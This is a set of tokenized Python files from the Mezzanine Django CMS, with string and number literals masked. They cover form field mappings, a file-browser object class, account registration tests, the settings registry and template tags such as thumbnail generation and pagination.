CHECKBOX : forms . BooleanField , <EOL> CHECKBOX_MULTIPLE : forms . MultipleChoiceField , <EOL> SELECT : forms . ChoiceField , <EOL> SELECT_MULTIPLE : forms . MultipleChoiceField , <EOL> RADIO_MULTIPLE : forms . ChoiceField , <EOL> FILE : forms . FileField , <EOL> DATE : forms . DateField , <EOL> DATE_TIME : forms . DateTimeField , <EOL> DOB : forms . DateField , <EOL> HIDDEN : forms . CharField , <EOL> NUMBER : forms . FloatField , <EOL> URL : forms . URLField , <EOL> } <EOL> WIDGETS = { <EOL> TEXTAREA : forms . Textarea , <EOL> CHECKBOX_MULTIPLE : forms . CheckboxSelectMultiple , <EOL> RADIO_MULTIPLE : forms . RadioSelect , <EOL> DATE : SelectDateWidget , <EOL> DOB : SelectDateWidget , <EOL> HIDDEN : forms . HiddenInput , <EOL> } <EOL> CHOICES = ( CHECKBOX , SELECT , RADIO_MULTIPLE ) <EOL> DATES = ( DATE , DATE_TIME , DOB ) <EOL> MULTIPLE = ( CHECKBOX_MULTIPLE , SELECT_MULTIPLE ) <EOL> if USE_HTML5 : <EOL> WIDGETS . update ( { <EOL> DATE : html5_field ( "<STR_LIT:date>" , forms . DateInput ) , <EOL> DATE_TIME : html5_field ( "<STR_LIT>" , forms . DateTimeInput ) , <EOL> DOB : html5_field ( "<STR_LIT:date>" , forms . DateInput ) , <EOL> EMAIL : html5_field ( "<STR_LIT:email>" , forms . TextInput ) , <EOL> NUMBER : html5_field ( "<STR_LIT>" , forms . TextInput ) , <EOL> URL : html5_field ( "<STR_LIT:url>" , forms . TextInput ) , <EOL> } ) <EOL> for field_id , field_path , field_name in EXTRA_FIELDS : <EOL> if field_id in CLASSES : <EOL> err = "<STR_LIT>" <EOL> raise ImproperlyConfigured ( err % ( field_id , field_name ) ) <EOL> CLASSES [ field_id ] = import_attr ( field_path ) <EOL> NAMES += ( ( field_id , _ ( field_name ) ) , ) <EOL> for field_id , widget_path in EXTRA_WIDGETS : <EOL> if field_id not in CLASSES : <EOL> err = "<STR_LIT>" <EOL> raise ImproperlyConfigured ( err % field_id ) <EOL> WIDGETS [ field_id ] = import_attr ( widget_path ) </s>
<s> from __future__ import unicode_literals <EOL> import os <EOL> import datetime <EOL> import time <EOL> import mimetypes <EOL> from django . core . files . storage import default_storage <EOL> from django . utils . encoding import smart_str <EOL> try : <EOL> from django . utils . encoding import smart_text <EOL> except ImportError : <EOL> from django . utils . encoding import smart_unicode as smart_text <EOL> from filebrowser_safe . settings import * <EOL> from filebrowser_safe . functions import get_file_type , path_strip , get_directory <EOL> class FileObject ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . head = os . path . dirname ( path ) <EOL> self . filename = os . path . basename ( path ) <EOL> self . filename_lower = self . filename . lower ( ) <EOL> self . filename_root , self . extension = os . path . splitext ( self . filename ) <EOL> self . mimetype = mimetypes . guess_type ( self . filename ) <EOL> def __str__ ( self ) : <EOL> return smart_str ( self . path ) <EOL> def __unicode__ ( self ) : <EOL> return smart_text ( self . path ) <EOL> @ property <EOL> def name ( self ) : <EOL> return self . path <EOL> def __repr__ ( self ) : <EOL> return smart_str ( "<STR_LIT>" % ( self . __class__ . __name__ , self or "<STR_LIT:None>" ) ) <EOL> def __len__ ( self ) : <EOL> return len ( self . path ) <EOL> _filetype_stored = None <EOL> def _filetype ( self ) : <EOL> if self . _filetype_stored != None : <EOL> return self . _filetype_stored <EOL> if self . is_folder : <EOL> self . _filetype_stored = '<STR_LIT>' <EOL> else : <EOL> self . _filetype_stored = get_file_type ( self . filename ) <EOL> return self . _filetype_stored <EOL> filetype = property ( _filetype ) <EOL> _filesize_stored = None <EOL> def _filesize ( self ) : <EOL> if self . _filesize_stored != None : <EOL> return self . _filesize_stored <EOL> if self . exists ( ) : <EOL> self . _filesize_stored = default_storage . size ( self . path ) <EOL> return self . _filesize_stored <EOL> return None <EOL> filesize = property ( _filesize ) <EOL> _date_stored = None <EOL> def _date ( self ) : <EOL> if self . _date_stored != None : <EOL> return self . _date_stored <EOL> if self . exists ( ) : <EOL> self . _date_stored = time . mktime ( default_storage . modified_time ( self . path ) . timetuple ( ) ) <EOL> return self . _date_stored <EOL> return None <EOL> date = property ( _date ) <EOL> def _datetime ( self ) : <EOL> if self . date : <EOL> return datetime . datetime . fromtimestamp ( self . date ) <EOL> return None <EOL> datetime = property ( _datetime ) <EOL> _exists_stored = None <EOL> def exists ( self ) : <EOL> if self . _exists_stored == None : <EOL> self . _exists_stored = default_storage . exists ( self . path ) <EOL> return self . _exists_stored <EOL> def _path_relative_directory ( self ) : <EOL> "<STR_LIT>" <EOL> return path_strip ( self . path , get_directory ( ) ) . lstrip ( "<STR_LIT:/>" ) <EOL> path_relative_directory = property ( _path_relative_directory ) <EOL> def _url ( self ) : <EOL> return default_storage . url ( self . path ) <EOL> url = property ( _url ) <EOL> def _directory ( self ) : <EOL> return path_strip ( self . path , get_directory ( ) ) <EOL> directory = property ( _directory ) <EOL> def _folder ( self ) : <EOL> return os . path . dirname ( path_strip ( os . path . join ( self . head , '<STR_LIT>' ) , get_directory ( ) ) ) <EOL> folder = property ( _folder ) <EOL> _is_folder_stored = None <EOL> def _is_folder ( self ) : <EOL> if self . _is_folder_stored == None : <EOL> self . _is_folder_stored = default_storage . isdir ( self . path ) <EOL> return self . _is_folder_stored <EOL> is_folder = property ( _is_folder ) <EOL> def _is_empty ( self ) : <EOL> if self . is_folder : <EOL> try : <EOL> dirs , files = default_storage . listdir ( self . path ) <EOL> except UnicodeDecodeError : <EOL> from mezzanine . core . exceptions import FileSystemEncodingChanged <EOL> raise FileSystemEncodingChanged ( ) <EOL> if not dirs and not files : <EOL> return True <EOL> return False <EOL> is_empty = property ( _is_empty ) <EOL> def delete ( self ) : <EOL> if self . is_folder : <EOL> default_storage . rmtree ( self . path ) <EOL> else : <EOL> default_storage . delete ( self . path ) <EOL> def delete_versions ( self ) : <EOL> for version in self . versions ( ) : <EOL> try : <EOL> default_storage . delete ( version ) <EOL> except : <EOL> pass <EOL> def delete_admin_versions ( self ) : <EOL> for version in self . admin_versions ( ) : <EOL> try : <EOL> default_storage . delete ( version ) <EOL> except : <EOL> pass </s>
<s> from django . core . management import call_command <EOL> from gevent import spawn <EOL> from gnotty . management . commands import gnottify <EOL> class Command ( gnottify . Command ) : <EOL> def handle ( self , * args , ** options ) : <EOL> spawn ( lambda : call_command ( "<STR_LIT>" , * args ) ) <EOL> super ( Command , self ) . handle ( * args , ** options ) </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . auth . tokens import default_token_generator <EOL> from django . core import mail <EOL> from django . core . urlresolvers import reverse <EOL> from django . forms . fields import DateField , DateTimeField <EOL> from django . utils . http import int_to_base36 <EOL> from mezzanine . accounts import ProfileNotConfigured <EOL> from mezzanine . accounts . forms import ProfileForm <EOL> from mezzanine . conf import settings <EOL> from mezzanine . utils . tests import TestCase <EOL> User = get_user_model ( ) <EOL> class AccountsTests ( TestCase ) : <EOL> def account_data ( self , test_value ) : <EOL> """<STR_LIT>""" <EOL> data = { "<STR_LIT:email>" : test_value + "<STR_LIT>" } <EOL> for field in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:username>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if field . startswith ( "<STR_LIT:password>" ) : <EOL> value = "<STR_LIT:x>" * settings . ACCOUNTS_MIN_PASSWORD_LENGTH <EOL> else : <EOL> value = test_value <EOL> data [ field ] = value <EOL> try : <EOL> profile_form = ProfileForm ( ) <EOL> ProfileFieldsForm = profile_form . get_profile_fields_form ( ) <EOL> for name , field in ProfileFieldsForm ( ) . fields . items ( ) : <EOL> if name != "<STR_LIT:id>" : <EOL> if hasattr ( field , "<STR_LIT>" ) : <EOL> value = list ( field . choices ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> elif isinstance ( field , ( DateField , DateTimeField ) ) : <EOL> value = "<STR_LIT>" <EOL> else : <EOL> value = test_value <EOL> data [ name ] = value <EOL> except ProfileNotConfigured : <EOL> pass <EOL> return data <EOL> def test_account ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . account_data ( "<STR_LIT>" ) <EOL> settings . ACCOUNTS_VERIFICATION_REQUIRED = False <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , data , follow = True ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> users = User . objects . filter ( email = data [ "<STR_LIT:email>" ] , is_active = True ) <EOL> self . assertEqual ( len ( users ) , <NUM_LIT:1> ) <EOL> settings . ACCOUNTS_VERIFICATION_REQUIRED = True <EOL> data = self . account_data ( "<STR_LIT>" ) <EOL> emails = len ( mail . outbox ) <EOL> response = self . client . post ( reverse ( "<STR_LIT>" ) , data , follow = True ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> users = User . objects . filter ( email = data [ "<STR_LIT:email>" ] , is_active = False ) <EOL> self . assertEqual ( len ( users ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( mail . outbox ) , emails + <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( mail . outbox [ <NUM_LIT:0> ] . to ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( mail . outbox [ <NUM_LIT:0> ] . to [ <NUM_LIT:0> ] , data [ "<STR_LIT:email>" ] ) <EOL> new_user = users [ <NUM_LIT:0> ] <EOL> verification_url = reverse ( "<STR_LIT>" , kwargs = { <EOL> "<STR_LIT>" : int_to_base36 ( new_user . id ) , <EOL> "<STR_LIT>" : default_token_generator . make_token ( new_user ) , <EOL> } ) <EOL> response = self . client . get ( verification_url , follow = True ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> users = User . objects . filter ( email = data [ "<STR_LIT:email>" ] , is_active = True ) <EOL> self . assertEqual ( len ( users ) , <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from weakref import WeakKeyDictionary <EOL> from future . builtins import bytes , str <EOL> from functools import partial <EOL> from importlib import import_module <EOL> from warnings import warn <EOL> from django . conf import settings as django_settings <EOL> from django . utils . functional import Promise <EOL> from django . utils . module_loading import module_has_submodule <EOL> from mezzanine import __version__ <EOL> from mezzanine . core . request import current_request <EOL> registry = { } <EOL> def register_setting ( name = None , label = None , editable = False , description = None , <EOL> default = None , choices = None , append = False , <EOL> translatable = False ) : <EOL> """<STR_LIT>""" <EOL> if name is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if editable and default is None : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if append and name in registry : <EOL> registry [ name ] [ "<STR_LIT:default>" ] += default <EOL> return <EOL> if hasattr ( django_settings , name ) : <EOL> editable = False <EOL> if label is None : <EOL> label = name . replace ( "<STR_LIT:_>" , "<STR_LIT:U+0020>" ) . title ( ) <EOL> if isinstance ( default , bool ) : <EOL> setting_type = bool <EOL> elif isinstance ( default , int ) : <EOL> setting_type = int <EOL> elif isinstance ( default , ( str , Promise ) ) : <EOL> setting_type = str <EOL> elif isinstance ( default , bytes ) : <EOL> setting_type = bytes <EOL> else : <EOL> setting_type = type ( default ) <EOL> registry [ name ] = { "<STR_LIT:name>" : name , "<STR_LIT:label>" : label , "<STR_LIT>" : editable , <EOL> "<STR_LIT:description>" : description , "<STR_LIT:default>" : default , <EOL> "<STR_LIT>" : choices , "<STR_LIT:type>" : setting_type , <EOL> "<STR_LIT>" : translatable } <EOL> class Settings ( object ) : <EOL> """<STR_LIT>""" <EOL> class Placeholder ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> NULL_REQUEST = Placeholder ( ) <EOL> TYPE_FUNCTIONS = { <EOL> bool : lambda val : val != "<STR_LIT:False>" , <EOL> bytes : partial ( bytes , encoding = '<STR_LIT:utf8>' ) <EOL> } <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _editable_caches = WeakKeyDictionary ( ) <EOL> @ property <EOL> def _current_request ( self ) : <EOL> return current_request ( ) or self . NULL_REQUEST <EOL> def use_editable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . clear_cache ( ) <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> def clear_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _editable_caches . pop ( self . _current_request , None ) <EOL> def _get_editable ( self , request ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> editable_settings = self . _editable_caches [ request ] <EOL> except KeyError : <EOL> editable_settings = self . _editable_caches [ request ] = self . _load ( ) <EOL> return editable_settings <EOL> @ classmethod <EOL> def _to_python ( cls , setting , raw_value ) : <EOL> """<STR_LIT>""" <EOL> type_fn = cls . TYPE_FUNCTIONS . get ( setting [ "<STR_LIT:type>" ] , setting [ "<STR_LIT:type>" ] ) <EOL> try : <EOL> value = type_fn ( raw_value ) <EOL> except ValueError : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( setting [ "<STR_LIT:name>" ] , setting [ "<STR_LIT:type>" ] . __name__ , <EOL> repr ( raw_value ) , repr ( setting [ "<STR_LIT:default>" ] ) ) ) <EOL> value = setting [ "<STR_LIT:default>" ] <EOL> return value <EOL> def _load ( self ) : <EOL> """<STR_LIT>""" <EOL> from mezzanine . conf . models import Setting <EOL> removed_settings = [ ] <EOL> conflicting_settings = [ ] <EOL> new_cache = { } <EOL> for setting_obj in Setting . objects . all ( ) : <EOL> try : <EOL> setting = registry [ setting_obj . name ] <EOL> except KeyError : <EOL> removed_settings . append ( setting_obj . name ) <EOL> continue <EOL> setting_value = self . _to_python ( setting , setting_obj . value ) <EOL> if hasattr ( django_settings , setting [ "<STR_LIT:name>" ] ) : <EOL> if setting_value != setting [ "<STR_LIT:default>" ] : <EOL> conflicting_settings . append ( setting_obj . name ) <EOL> continue <EOL> new_cache [ setting [ "<STR_LIT:name>" ] ] = setting_value <EOL> if removed_settings : <EOL> Setting . objects . filter ( name__in = removed_settings ) . delete ( ) <EOL> if conflicting_settings : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % "<STR_LIT:U+002CU+0020>" . join ( conflicting_settings ) ) <EOL> return new_cache <EOL> def __getattr__ ( self , name ) : <EOL> try : <EOL> setting = registry [ name ] <EOL> except KeyError : <EOL> return getattr ( django_settings , name ) <EOL> if setting [ "<STR_LIT>" ] : <EOL> editable_cache = self . _get_editable ( request = self . _current_request ) <EOL> return getattr ( django_settings , name , <EOL> editable_cache . get ( name , setting [ "<STR_LIT:default>" ] ) ) <EOL> return getattr ( django_settings , name , setting [ "<STR_LIT:default>" ] ) <EOL> def __setattr__ ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> setattr ( django_settings , key , value ) <EOL> def __delattr__ ( self , item ) : <EOL> """<STR_LIT>""" <EOL> delattr ( django_settings , item ) <EOL> mezz_first = lambda app : not app . startswith ( "<STR_LIT>" ) <EOL> for app in sorted ( django_settings . INSTALLED_APPS , key = mezz_first ) : <EOL> try : <EOL> module = import_module ( app ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> try : <EOL> import_module ( "<STR_LIT>" % app ) <EOL> except : <EOL> if module_has_submodule ( module , "<STR_LIT>" ) : <EOL> raise <EOL> settings = Settings ( ) </s>
<s> from __future__ import absolute_import , division , unicode_literals <EOL> from future . builtins import int , open , str <EOL> from hashlib import md5 <EOL> import os <EOL> try : <EOL> from urllib . parse import quote , unquote <EOL> except ImportError : <EOL> from urllib import quote , unquote <EOL> from django . apps import apps <EOL> from django . contrib import admin <EOL> from django . contrib . auth import REDIRECT_FIELD_NAME <EOL> from django . contrib . sites . models import Site <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . core . files import File <EOL> from django . core . files . storage import default_storage <EOL> from django . core . urlresolvers import reverse , resolve , NoReverseMatch <EOL> from django . db . models import Model <EOL> from django . template import Context , Node , Template , TemplateSyntaxError <EOL> from django . template . base import ( TOKEN_BLOCK , TOKEN_COMMENT , <EOL> TOKEN_TEXT , TOKEN_VAR , TextNode ) <EOL> from django . template . defaultfilters import escape <EOL> from django . template . loader import get_template <EOL> from django . utils import translation <EOL> from django . utils . html import strip_tags <EOL> from django . utils . text import capfirst <EOL> from mezzanine . conf import settings <EOL> from mezzanine . core . fields import RichTextField <EOL> from mezzanine . core . forms import get_edit_form <EOL> from mezzanine . utils . cache import nevercache_token , cache_installed <EOL> from mezzanine . utils . html import decode_entities <EOL> from mezzanine . utils . importing import import_dotted_path <EOL> from mezzanine . utils . sites import current_site_id , has_site_permission <EOL> from mezzanine . utils . urls import admin_url <EOL> from mezzanine . utils . views import is_editable <EOL> from mezzanine import template <EOL> register = template . Library ( ) <EOL> if "<STR_LIT>" in settings . INSTALLED_APPS : <EOL> @ register . tag <EOL> def compress ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> from compressor . templatetags . compress import compress <EOL> return compress ( parser , token ) <EOL> else : <EOL> @ register . to_end_tag <EOL> def compress ( parsed , context , token ) : <EOL> """<STR_LIT>""" <EOL> return parsed <EOL> if cache_installed ( ) : <EOL> @ register . tag <EOL> def nevercache ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> text = [ ] <EOL> end_tag = "<STR_LIT>" <EOL> tag_mapping = { <EOL> TOKEN_TEXT : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TOKEN_VAR : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TOKEN_BLOCK : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TOKEN_COMMENT : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> } <EOL> delimiter = nevercache_token ( ) <EOL> while parser . tokens : <EOL> token = parser . next_token ( ) <EOL> if token . token_type == TOKEN_BLOCK and token . contents == end_tag : <EOL> return TextNode ( delimiter + "<STR_LIT>" . join ( text ) + delimiter ) <EOL> start , end = tag_mapping [ token . token_type ] <EOL> text . append ( "<STR_LIT>" % ( start , token . contents , end ) ) <EOL> parser . unclosed_block_tag ( end_tag ) <EOL> else : <EOL> @ register . to_end_tag <EOL> def nevercache ( parsed , context , token ) : <EOL> """<STR_LIT>""" <EOL> return parsed <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def fields_for ( context , form , template = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> context [ "<STR_LIT>" ] = form <EOL> return get_template ( template ) . render ( context ) <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def errors_for ( context , form ) : <EOL> """<STR_LIT>""" <EOL> return { "<STR_LIT>" : form } <EOL> @ register . filter <EOL> def sort_by ( items , attr ) : <EOL> """<STR_LIT>""" <EOL> def key_func ( item ) : <EOL> try : <EOL> return getattr ( item , attr ) <EOL> except AttributeError : <EOL> try : <EOL> return item [ attr ] <EOL> except TypeError : <EOL> getattr ( item , attr ) <EOL> return sorted ( items , key = key_func ) <EOL> @ register . filter <EOL> def is_installed ( app_name ) : <EOL> """<STR_LIT>""" <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return app_name in settings . INSTALLED_APPS <EOL> @ register . tag <EOL> def ifinstalled ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> tag , app = token . split_contents ( ) <EOL> except ValueError : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> end_tag = "<STR_LIT:end>" + tag <EOL> unmatched_end_tag = <NUM_LIT:1> <EOL> if app . strip ( "<STR_LIT>" ) not in settings . INSTALLED_APPS : <EOL> while unmatched_end_tag : <EOL> token = parser . tokens . pop ( <NUM_LIT:0> ) <EOL> if token . token_type == TOKEN_BLOCK : <EOL> block_name = token . contents . split ( ) [ <NUM_LIT:0> ] <EOL> if block_name == tag : <EOL> unmatched_end_tag += <NUM_LIT:1> <EOL> if block_name == end_tag : <EOL> unmatched_end_tag -= <NUM_LIT:1> <EOL> parser . tokens . insert ( <NUM_LIT:0> , token ) <EOL> nodelist = parser . parse ( ( end_tag , ) ) <EOL> parser . delete_first_token ( ) <EOL> class IfInstalledNode ( Node ) : <EOL> def render ( self , context ) : <EOL> return nodelist . render ( context ) <EOL> return IfInstalledNode ( ) <EOL> @ register . render_tag <EOL> def set_short_url_for ( context , token ) : <EOL> """<STR_LIT>""" <EOL> obj = context [ token . split_contents ( ) [ <NUM_LIT:1> ] ] <EOL> obj . set_short_url ( ) <EOL> return "<STR_LIT>" <EOL> @ register . simple_tag <EOL> def gravatar_url ( email , size = <NUM_LIT:32> ) : <EOL> """<STR_LIT>""" <EOL> bits = ( md5 ( email . lower ( ) . encode ( "<STR_LIT:utf-8>" ) ) . hexdigest ( ) , size ) <EOL> return "<STR_LIT>" % bits <EOL> @ register . to_end_tag <EOL> def metablock ( parsed ) : <EOL> """<STR_LIT>""" <EOL> parsed = "<STR_LIT:U+0020>" . join ( parsed . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) . split ( ) ) . replace ( "<STR_LIT>" , "<STR_LIT:U+002C>" ) <EOL> return escape ( strip_tags ( decode_entities ( parsed ) ) ) <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def pagination_for ( context , current_page , page_var = "<STR_LIT>" , exclude_vars = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> querystring = context [ "<STR_LIT>" ] . GET . copy ( ) <EOL> exclude_vars = [ v for v in exclude_vars . split ( "<STR_LIT:U+002C>" ) if v ] + [ page_var ] <EOL> for exclude_var in exclude_vars : <EOL> if exclude_var in querystring : <EOL> del querystring [ exclude_var ] <EOL> querystring = querystring . urlencode ( ) <EOL> return { <EOL> "<STR_LIT>" : current_page , <EOL> "<STR_LIT>" : querystring , <EOL> "<STR_LIT>" : page_var , <EOL> } <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def search_form ( context , search_model_names = None ) : <EOL> """<STR_LIT>""" <EOL> template_vars = { <EOL> "<STR_LIT>" : context [ "<STR_LIT>" ] , <EOL> } <EOL> if not search_model_names or not settings . SEARCH_MODEL_CHOICES : <EOL> search_model_names = [ ] <EOL> elif search_model_names == "<STR_LIT:all>" : <EOL> search_model_names = list ( settings . SEARCH_MODEL_CHOICES ) <EOL> else : <EOL> search_model_names = search_model_names . split ( "<STR_LIT:U+0020>" ) <EOL> search_model_choices = [ ] <EOL> for model_name in search_model_names : <EOL> try : <EOL> model = apps . get_model ( * model_name . split ( "<STR_LIT:.>" , <NUM_LIT:1> ) ) <EOL> except LookupError : <EOL> pass <EOL> else : <EOL> verbose_name = model . _meta . verbose_name_plural . capitalize ( ) <EOL> search_model_choices . append ( ( verbose_name , model_name ) ) <EOL> template_vars [ "<STR_LIT>" ] = sorted ( search_model_choices ) <EOL> return template_vars <EOL> @ register . simple_tag <EOL> def thumbnail ( image_url , width , height , upscale = True , quality = <NUM_LIT> , left = <NUM_LIT> , <EOL> top = <NUM_LIT> , padding = False , padding_color = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if not image_url : <EOL> return "<STR_LIT>" <EOL> try : <EOL> from PIL import Image , ImageFile , ImageOps <EOL> except ImportError : <EOL> return "<STR_LIT>" <EOL> image_url = unquote ( str ( image_url ) ) . split ( "<STR_LIT:?>" ) [ <NUM_LIT:0> ] <EOL> if image_url . startswith ( settings . MEDIA_URL ) : <EOL> image_url = image_url . replace ( settings . MEDIA_URL , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> image_dir , image_name = os . path . split ( image_url ) <EOL> image_prefix , image_ext = os . path . splitext ( image_name ) <EOL> filetype = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } . get ( image_ext , "<STR_LIT>" ) <EOL> thumb_name = "<STR_LIT>" % ( image_prefix , width , height ) <EOL> if not upscale : <EOL> thumb_name += "<STR_LIT>" <EOL> if left != <NUM_LIT> or top != <NUM_LIT> : <EOL> left = min ( <NUM_LIT:1> , max ( <NUM_LIT:0> , left ) ) <EOL> top = min ( <NUM_LIT:1> , max ( <NUM_LIT:0> , top ) ) <EOL> thumb_name = "<STR_LIT>" % ( thumb_name , left , top ) <EOL> thumb_name += "<STR_LIT>" % padding_color if padding else "<STR_LIT>" <EOL> thumb_name = "<STR_LIT>" % ( thumb_name , image_ext ) <EOL> thumb_dir = os . path . join ( settings . MEDIA_ROOT , image_dir , <EOL> settings . THUMBNAILS_DIR_NAME , image_name ) <EOL> if not os . path . exists ( thumb_dir ) : <EOL> try : <EOL> os . makedirs ( thumb_dir ) <EOL> except OSError : <EOL> pass <EOL> thumb_path = os . path . join ( thumb_dir , thumb_name ) <EOL> thumb_url = "<STR_LIT>" % ( settings . THUMBNAILS_DIR_NAME , <EOL> quote ( image_name . encode ( "<STR_LIT:utf-8>" ) ) , <EOL> quote ( thumb_name . encode ( "<STR_LIT:utf-8>" ) ) ) <EOL> image_url_path = os . path . dirname ( image_url ) <EOL> if image_url_path : <EOL> thumb_url = "<STR_LIT>" % ( image_url_path , thumb_url ) <EOL> try : <EOL> thumb_exists = os . path . exists ( thumb_path ) <EOL> except UnicodeEncodeError : <EOL> from mezzanine . core . exceptions import FileSystemEncodingChanged <EOL> raise FileSystemEncodingChanged ( ) <EOL> if thumb_exists : <EOL> return thumb_url <EOL> elif not default_storage . exists ( image_url ) : <EOL> return image_url <EOL> f = default_storage . open ( image_url ) <EOL> try : <EOL> image = Image . open ( f ) <EOL> except : <EOL> return image_url <EOL> image_info = image . info <EOL> to_width = int ( width ) <EOL> to_height = int ( height ) <EOL> from_width = image . size [ <NUM_LIT:0> ] <EOL> from_height = image . size [ <NUM_LIT:1> ] <EOL> if not upscale : <EOL> to_width = min ( to_width , from_width ) <EOL> to_height = min ( to_height , from_height ) <EOL> if to_width == <NUM_LIT:0> : <EOL> to_width = from_width * to_height // from_height <EOL> elif to_height == <NUM_LIT:0> : <EOL> to_height = from_height * to_width // from_width <EOL> if image . mode not in ( "<STR_LIT:P>" , "<STR_LIT:L>" , "<STR_LIT>" ) : <EOL> try : <EOL> image = image . convert ( "<STR_LIT>" ) <EOL> except : <EOL> return image_url <EOL> ImageFile . MAXBLOCK = <NUM_LIT:2> * ( max ( image . size ) ** <NUM_LIT:2> ) <EOL> if padding and to_width and to_height : <EOL> from_ratio = float ( from_width ) / from_height <EOL> to_ratio = float ( to_width ) / to_height <EOL> pad_size = None <EOL> if to_ratio < from_ratio : <EOL> pad_height = int ( to_height * ( float ( from_width ) / to_width ) ) <EOL> pad_size = ( from_width , pad_height ) <EOL> pad_top = ( pad_height - from_height ) // <NUM_LIT:2> <EOL> pad_left = <NUM_LIT:0> <EOL> elif to_ratio > from_ratio : <EOL> pad_width = int ( to_width * ( float ( from_height ) / to_height ) ) <EOL> pad_size = ( pad_width , from_height ) <EOL> pad_top = <NUM_LIT:0> <EOL> pad_left = ( pad_width - from_width ) // <NUM_LIT:2> <EOL> if pad_size is not None : <EOL> pad_container = Image . new ( "<STR_LIT>" , pad_size , padding_color ) <EOL> pad_container . paste ( image , ( pad_left , pad_top ) ) <EOL> image = pad_container <EOL> to_size = ( to_width , to_height ) <EOL> to_pos = ( left , top ) <EOL> try : <EOL> image = ImageOps . fit ( image , to_size , Image . ANTIALIAS , <NUM_LIT:0> , to_pos ) <EOL> image = image . save ( thumb_path , filetype , quality = quality , ** image_info ) <EOL> if "<STR_LIT>" in settings . MEDIA_URL : <EOL> with open ( thumb_path , "<STR_LIT:rb>" ) as f : <EOL> default_storage . save ( thumb_url , File ( f ) ) <EOL> except Exception : <EOL> try : <EOL> os . remove ( thumb_path ) <EOL> except Exception : <EOL> pass <EOL> return image_url <EOL> return thumb_url <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def editable_loader ( context ) : <EOL> """<STR_LIT>""" <EOL> user = context [ "<STR_LIT>" ] . user <EOL> template_vars = { <EOL> "<STR_LIT>" : has_site_permission ( user ) , <EOL> "<STR_LIT>" : context [ "<STR_LIT>" ] , <EOL> } <EOL> if ( settings . INLINE_EDITING_ENABLED and <EOL> template_vars [ "<STR_LIT>" ] ) : <EOL> t = get_template ( "<STR_LIT>" ) <EOL> template_vars [ "<STR_LIT>" ] = REDIRECT_FIELD_NAME <EOL> template_vars [ "<STR_LIT>" ] = context . get ( "<STR_LIT>" , <EOL> context . get ( "<STR_LIT>" , None ) ) <EOL> template_vars [ "<STR_LIT>" ] = context . get ( <EOL> "<STR_LIT>" , None ) <EOL> template_vars [ "<STR_LIT>" ] = t . render ( Context ( template_vars ) ) <EOL> template_vars [ "<STR_LIT>" ] = RichTextField ( ) . formfield ( <EOL> ) . widget . media <EOL> return template_vars <EOL> @ register . filter <EOL> def richtext_filters ( content ) : <EOL> """<STR_LIT>""" <EOL> filter_names = settings . RICHTEXT_FILTERS <EOL> if not filter_names : <EOL> try : <EOL> filter_names = [ settings . RICHTEXT_FILTER ] <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for filter_name in filter_names : <EOL> filter_func = import_dotted_path ( filter_name ) <EOL> content = filter_func ( content ) <EOL> return content <EOL> @ register . filter <EOL> def richtext_filter ( content ) : <EOL> """<STR_LIT>""" <EOL> from warnings import warn <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return richtext_filters ( content ) 